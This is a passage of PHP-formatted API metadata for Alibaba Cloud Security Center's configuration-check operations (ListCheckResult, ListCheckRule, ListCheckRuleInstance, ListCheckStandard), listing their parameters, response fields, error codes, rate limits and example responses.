''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '5', 'title' => ''], 'CheckShowName' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'OSS-PublicReadOpenManifestFileWithoutEncryption', 'title' => ''], 'Vendor' => ['description' => 'The cloud service provider.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'VendorShowName' => ['description' => 'The name of the cloud service provider.', 'type' => 'string', 'example' => 'Aliyun', 'title' => ''], 'InstanceType' => ['description' => 'The asset type of the cloud service. Valid values:'."\n" ."\n" .'- **ECS**: ECS'."\n" ."\n" .'- **SLB**: SLB'."\n" ."\n" .'- **RDS**: ApsaraDB RDS'."\n" ."\n" .'- **MONGODB**: MongoDB'."\n" ."\n" .'- **KVSTORE**: Redis'."\n" ."\n" .'- **ACR**: Container Registry'."\n" ."\n" .'- **CSK**: ACK'."\n" ."\n" .'- **VPC**: VPC'."\n" ."\n" .'- **ACTIONTRAIL**: ActionTrail'."\n" ."\n" .'- **CDN**: CDN'."\n" ."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service)'."\n" ."\n" .'- **RDC**: Apsara Devops'."\n" ."\n" .'- **RAM**: RAM'."\n" ."\n" .'- **DDOS**: Anti-DDoS'."\n" ."\n" .'- **WAF**: WAF'."\n" ."\n" .'- **OSS**: OSS'."\n" ."\n" .'- **POLARDB**: PolarDB'."\n" ."\n" .'- **POSTGRESQL**: ApsaraDB RDS for PostgreSQL'."\n" ."\n" .'- **MSE**: MSE'."\n" ."\n" .'- **NAS**: NAS'."\n" ."\n" .'- **SDDP**: SDDP'."\n" ."\n" .'- **EIP**: EIP', 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'InstanceSubType' => ['description' => 'The asset subtype of the cloud service. Valid values:'."\n" ."\n" .'- If the **InstanceType** parameter is set to **ECS**, this parameter supports the following valid values:'."\n" ."\n" .' - **INSTANCE**'."\n" ."\n" .' - **DISK**'."\n" ."\n" .' - **SECURITY\\_GROUP**'."\n" ."\n" .'- If the **InstanceType** parameter is set to **ACR**, this parameter supports the following valid values:'."\n" ."\n" .' - **REPOSITORY\\_ENTERPRISE**'."\n" ."\n" .' - **REPOSITORY\\_PERSON**'."\n" ."\n" .'- If the **InstanceType** parameter is set to **RAM**, this parameter supports the following valid values:'."\n" ."\n" .' - **ALIAS**'."\n" ."\n" .' - **USER**'."\n" ."\n" .' - **POLICY**'."\n" ."\n" .' - **GROUP**'."\n" ."\n" .'- If the **InstanceType** parameter is set to **WAF**, this parameter supports the following valid values:'."\n" ."\n" .' - **DOMAIN**'."\n" ."\n" .'- If the **InstanceType** parameter is set to other values, this parameter supports the following valid values:'."\n" ."\n" .' - **INSTANCE**', 'type' => 'string', 'example' => 'DISK', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level of the check item. Valid values:'."\n" ."\n" .'- **HIGH**'."\n" ."\n" .'- **MEDIUM**'."\n" ."\n" .'- **LOW**', 'type' => 'string', 'example' => 'HIGH', 'title' => ''], 'Status' => ['description' => 'The status of the check item. Valid values:'."\n" ."\n" .'- **PASS**: passed'."\n" ."\n" .'- **NOT\\_PASS**: failed'."\n" ."\n" .'- **CHECKING**: being checked'."\n" ."\n" .'- **NOT\\_CHECK**: not checked'."\n" ."\n" .'- **WHITELIST**: added to the whitelist'."\n" ."\n" .'- **FAILED**: failed', 'type' => 'string', 'example' => 'PASS', 'title' => ''], 'TaskId' => ['description' => 'The ID of the check task.', 'type' => 'string', 'example' => '64', 'title' => ''], 'LastCheckTime' => ['description' => 'The timestamp when the last check was performed. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1657793398000', 'title' => ''], 'TrialPermission' => ['description' => 'Indicates whether the TRIAL permission is required.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'StatusMessage' => ['description' => 'The message returned if the status of the check item is abnormal.', 'type' => 'string', 'example' => 'TIMEOUT', 'title' => ''], 'CheckSaleType' => ['description' => 'The type of the check item. Valid values:'."\n" ."\n" .'- **0**: paid'."\n" ."\n" .'- **1**: free', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AssetVendor' => ['description' => 'The service provider of the asset. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud'."\n" ."\n" .'- **3**: Huawei Cloud'."\n" ."\n" .'- **4**: Microsoft Azure'."\n" ."\n" .'- **5**: AWS'."\n" ."\n" .'- **7**: Tencent Cloud', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'CheckType' => ['description' => 'The source type of the situation awareness check item:'."\n" ."\n" .'- **CUSTOM**: User-defined'."\n" ."\n" .'- **SYSTEM**: Predefined by the situation awareness platform', 'type' => 'string', 'example' => 'SYSTEM', 'title' => ''], 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'- **0**: an ECS instance'."\n" ."\n" .'- **1**: a SLB instance'."\n" ."\n" .'- **2**: a NAT gateway'."\n" ."\n" .'- **3**: an ApsaraDB RDS instance'."\n" ."\n" .'- **4**: an ApsaraDB for MongoDB instance'."\n" ."\n" .'- **5**: an ApsaraDB for Redis instance'."\n" ."\n" .'- **6**: a container image'."\n" ."\n" .'- **7**: a container', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'OperationType' => ['description' => 'Indicates whether fixing is supported. Valid values:'."\n" ."\n" .'- **SUPPORT\\_REPAIR**'."\n" ."\n" .'- **NOT\\_SUPPORT\\_REPAIR**', 'type' => 'string', 'example' => 'NOT_SUPPORT_REPAIR', 'title' => ''], 'TrialPermissionType' => ['description' => 'Check whether the data delivery period for ActionTrail is enabled for more than 30 days to establish a baseline of behaviour.'."\n" ."\n" .'- **0**: REQUIRED'."\n" ."\n" .'- **1**: NOT REQUIRED', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => 'F9B6DD67-B289-5406-B35C-B0F4A217S23', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Checks\\": [\\n {\\n \\"CheckPolicies\\": [\\n {\\n \\"StandardId\\": 1,\\n \\"StandardShowName\\": \\"Best security practices\\",\\n \\"RequirementId\\": 2,\\n \\"RequirementShowName\\": \\"Alibaba cloud OSS best security practices\\",\\n \\"SectionId\\": 3,\\n \\"SectionShowName\\": \\"Log Audit\\"\\n }\\n ],\\n \\"CheckId\\": 5,\\n \\"CheckShowName\\": \\"OSS-PublicReadOpenManifestFileWithoutEncryption\\",\\n \\"Vendor\\": \\"ALIYUN\\",\\n \\"VendorShowName\\": \\"Aliyun\\",\\n \\"InstanceType\\": \\"ECS\\",\\n \\"InstanceSubType\\": \\"DISK\\",\\n \\"RiskLevel\\": \\"HIGH\\",\\n \\"Status\\": \\"PASS\\",\\n \\"TaskId\\": \\"64\\",\\n \\"LastCheckTime\\": 1657793398000,\\n \\"TrialPermission\\": true,\\n \\"StatusMessage\\": \\"TIMEOUT\\",\\n \\"CheckSaleType\\": 1,\\n \\"AssetVendor\\": 3,\\n \\"CheckType\\": \\"SYSTEM\\",\\n \\"AssetType\\": 0,\\n \\"AssetSubType\\": 0,\\n \\"OperationType\\": \\"NOT_SUPPORT_REPAIR\\",\\n \\"TrialPermissionType\\": 1\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 2\\n },\\n \\"RequestId\\": \\"F9B6DD67-B289-5406-B35C-B0F4A217S23\\"\\n}","type":"json"}]', 'title' => 'ListCheckResult', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCheckRule' => [ 'summary' => 'Display cloud product configuration check rules', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '230300', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) API to get the check item ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '58', 'title' => ''], ], [ 'name' => 'CheckName', 'in' => 'query', 'schema' => ['description' => 'The name of the check item.', 'type' => 'string', 'required' => false, 'example' => 'checkName', 'title' => ''], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The type of rule. Default is **WHITE**. Values:'."\n" .'- **WHITE**: Add to whitelist', 'type' => 'string', 'required' => false, 'example' => 'WHITE', 'title' => ''], ], [ 'name' => 'ScopeType', 'in' => 'query', 'schema' => ['description' => 'The scope where the rule applies. Values:'."\n" .'- **INSTNACE**: Instance'."\n" .'- **ITEM**: Check item', 'type' => 'string', 'required' => false, 'example' => 'INSTANCE', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number displayed in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of check items displayed per page in a paginated query. The default value is **20**, indicating 20 check items per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Set the language type for the request and response messages. The default is **zh**. Values:'."\n" ."\n" .'- zh: Chinese'."\n" .'- en: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of task sources.', 'type' => 'array', 'items' => ['description' => 'Task source. Values: - **YAO_CHI**: Yaochi Console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The data type returned.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. It can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****'], 'CheckRules' => [ 'description' => 'Check rules.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'AliUid' => ['description' => 'The UID of the current user.', 'type' => 'integer', 'format' => 'int64', 'example' => '176316827610****', 'title' => ''], 'Vendor' => ['description' => 'The server vendor. Values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: Non-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: Other cloud assets', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of cloud asset.'."\n" .'> For specific meanings, refer to the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) AssetType.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '77', 'title' => ''], 'ScopeType' => ['description' => 'The scope where the rule applies. Values:'."\n" .'- **INSTNACE**: Instance'."\n" .'- **ITEM**: Check item', 'type' => 'string', 'example' => 'INSTANCE', 'title' => ''], 'RuleType' => ['description' => 'The type of rule. Default is **WHITE**. Values:'."\n" .'- **WHITE**: Add to whitelist', 'type' => 'string', 'example' => 'WHITE', 'title' => ''], 'RuleId' => ['description' => 'The ID of the rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '8000**', 'title' => ''], 'CheckShowName' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'Check for IPS Whitelist on CEN (Enterprise Edition) Tab', 'title' => ''], 'CheckPolicies' => [ 'description' => 'The display name of the check item section.', 'type' => 'array', 'items' => [ 'description' => 'The display name of the check item section.', 'type' => 'object', 'properties' => [ 'sectionShowName' => ['description' => 'Display name of the item\'s chapter.', 'type' => 'string', 'example' => 'Access Control', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AssetSubType' => ['description' => 'The subtype of the cloud product.'."\n" ."\n" .'> For specific meanings, refer to the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) AssetSubType.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VendorName' => ['description' => 'The name of the server provider.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'InstanceType' => ['description' => 'The asset type of the cloud product.', 'type' => 'string', 'example' => 'ecs', 'title' => ''], 'InstanceSubType' => ['description' => 'The sub-asset type of the cloud product.', 'type' => 'string', 'example' => 'INSTANCE', 'title' => ''], 'Remark' => ['description' => 'Remark.', 'type' => 'string', 'example' => 'remark', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of data entries displayed per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Count' => ['description' => 'The number of data entries displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'Total number of data entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\",\\n \\"CheckRules\\": [\\n {\\n \\"AliUid\\": 0,\\n \\"Vendor\\": 0,\\n \\"AssetType\\": 1,\\n \\"CheckId\\": 77,\\n \\"ScopeType\\": \\"INSTANCE\\",\\n \\"RuleType\\": \\"WHITE\\",\\n \\"RuleId\\": 0,\\n \\"CheckShowName\\": \\"Check for IPS Whitelist on CEN (Enterprise Edition) Tab\\",\\n \\"CheckPolicies\\": [\\n {\\n \\"sectionShowName\\": \\"Access Control\\"\\n }\\n ],\\n \\"AssetSubType\\": 0,\\n \\"VendorName\\": \\"ALIYUN\\",\\n \\"InstanceType\\": \\"ecs\\",\\n \\"InstanceSubType\\": \\"INSTANCE\\",\\n \\"Remark\\": \\"remark\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"Count\\": 10,\\n \\"TotalCount\\": 10\\n }\\n}","type":"json"}]', 'title' => 'Query Cloud Security Posture Management Check Rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCheckRuleInstance' => [ 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '230328', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'InstanceList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of instances.', 'type' => 'array', 'items' => [ 'description' => 'The list of instances.', 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region where the asset resides.'."\n" .'> Call the [ListCheckInstanceResult](~~ListCheckInstanceResult~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cn-hongkong', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.'."\n" .'> Call the [ListCheckInstanceResult](~~ListCheckInstanceResult~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'i-wz9fdluqx20mp2x7****', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> Call the [LisCheckRule](~~2590599~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number to return when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return per page when paging is used. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The returned message data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****'], 'CheckRuleInstances' => [ 'description' => 'The list of instance rule information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 'i-j6c76lh1kvrcvwl*****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'testEcs', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AliUid' => ['description' => 'The Alibaba Cloud account ID.', 'type' => 'string', 'example' => '103784262032****', 'title' => ''], 'CheckId' => ['description' => 'The check item ID.', 'type' => 'string', 'example' => '23', 'title' => ''], 'Vendor' => ['description' => 'The cloud service provider. Valid values:'."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **TENCENT**: Tencent Cloud'."\n" .'- **MICROSOFT**: Microsoft'."\n" .'- **AWS**: Amazon Web Services (AWS).', 'type' => 'string', 'example' => 'Aliyun', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud asset.', 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service.', 'type' => 'string', 'example' => 'Disk', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query instances of a CSPM rule', 'summary' => 'Queries all instances under a Cloud Security Posture Management (CSPM) rule.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckRuleInstance'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckRuleInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"CheckRuleInstances\\": [\\n {\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"InstanceId\\": \\"i-j6c76lh1kvrcvwl*****\\",\\n \\"InstanceName\\": \\"testEcs\\"\\n }\\n ],\\n \\"AliUid\\": \\"103784262032****\\",\\n \\"CheckId\\": \\"23\\",\\n \\"Vendor\\": \\"Aliyun\\",\\n \\"AssetType\\": \\"ECS\\",\\n \\"AssetSubType\\": \\"Disk\\"\\n}","type":"json"}]', ], 'ListCheckStandard' => [ 'summary' => 'Queries the standards of configuration checks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119339', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The cloud service providers. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud.'."\n" ."\n" .'- **TENCENT**: Tencent Cloud.'."\n" ."\n" .'- **HUAWEICLOUD**: Huawei Cloud.'."\n" ."\n" .'- **MICROSOFT**: Microsoft Azure.'."\n" ."\n" .'- **AWS**: Amazon Web Services (AWS).', 'type' => 'array', 'items' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" ."\n" .'- **TENCENT**: Tencent Cloud.'."\n" ."\n" .'- **HUAWEICLOUD**: Huawei Cloud.'."\n" ."\n" .'- **MICROSOFT**: Microsoft Azure.'."\n" ."\n" .'- **AWS**.', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The asset types of cloud services.', 'type' => 'array', 'items' => ['description' => 'The asset type of the cloud service. Valid values:'."\n" ."\n" .'- **ECS**: Elastic Compute Service (ECS).'."\n" ."\n" .'- **SLB**: Server Load Balancer (SLB).'."\n" ."\n" .'- **RDS**: ApsaraDB RDS.'."\n" ."\n" .'- **MONGODB**: ApsaraDB for MongoDB (MongoDB).'."\n" ."\n" .'- **KVSTORE**: ApsaraDB for Redis (Redis).'."\n" ."\n" .'- **ACR**: Container Registry.'."\n" ."\n" .'- **CSK**: Container Service for Kubernetes (ACK).'."\n" ."\n" .'- **VPC**: Virtual Private Cloud (VPC).'."\n" ."\n" .'- **ACTIONTRAIL**: ActionTrail.'."\n" ."\n" .'- **CDN**: Alibaba Cloud CDN (CDN).'."\n" ."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service).'."\n" ."\n" .'- **RDC**: Alibaba Cloud DevOps.'."\n" ."\n" .'- **RAM**: Resource Access Management (RAM).'."\n" ."\n" .'- **DDOS**: Anti-DDoS.'."\n" ."\n" .'- **WAF**: Web Application Firewall (WAF).'."\n" ."\n" .'- **OSS**: Object Storage Service (OSS).'."\n" ."\n" .'- **POLARDB**: PolarDB.'."\n" ."\n" .'- **POSTGRESQL**: ApsaraDB RDS for PostgreSQL.'."\n" ."\n" .'- **MSE**: Microservices Engine (MSE).'."\n" ."\n" .'- **NAS**: File Storage NAS (NAS).'."\n" ."\n" .'- **SDDP**: Sensitive Data Discovery and Protection (SDDP).'."\n" ."\n" .'- **EIP**: Elastic IP Address (EIP).', 'type' => 'string', 'required' => false, 'example' => 'ECS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceSubTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The subtypes of cloud services.', 'type' => 'array', 'items' => ['description' => 'The subtype of the cloud service.', 'type' => 'string', 'required' => false, 'example' => 'INSTANCE', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance IDs of the cloud services to which the check items belong.', 'type' => 'array', 'items' => ['description' => 'The instance ID of the cloud service to which the check item belongs.', 'type' => 'string', 'required' => false, 'example' => 'i-***', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of task sources.', 'type' => 'array', 'items' => ['description' => 'Task source. Values:'."\n" ."\n" .'- **YAO\\_CHI**: Yaochi Console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Standards' => [ 'description' => 'The standards.', 'type' => 'array', 'items' => [ 'description' => 'The standard.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the standard.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'ShowName' => ['description' => 'The display name of the check item.', 'type' => 'string', 'example' => '身份权限管理', 'title' => ''], 'Requirements' => [ 'description' => 'The requirements.', 'type' => 'array', 'items' => [ 'description' => 'The requirement.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the requirement.', 'type' => 'integer', 'format' => 'int64', 'example' => '11', 'title' => ''], 'ShowName' => ['description' => 'The display name of the search condition.', 'type' => 'string', 'example' => 'RAM身份认证', 'title' => ''], 'RiskCheckCount' => ['description' => 'The number of check items in the requirement.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'ShowPriorityLevel' => ['description' => 'The priority for display.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Type' => ['description' => 'The type of the standard.', 'type' => 'string', 'example' => 'IDENTITY_PERMISSION', 'title' => ''], 'ShowPriorityLevel' => ['description' => 'The priority for display.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BindVendor' => ['description' => 'The cloud service provider that uses the standard. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud.'."\n" ."\n" .'- **3**: Tencent Cloud.'."\n" ."\n" .'- **4**: Huawei Cloud.'."\n" ."\n" .'- **5**: Microsoft Azure.'."\n" ."\n" .'- **7**: AWS.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'FA91FBDA-***', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'ListCheckStandard', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 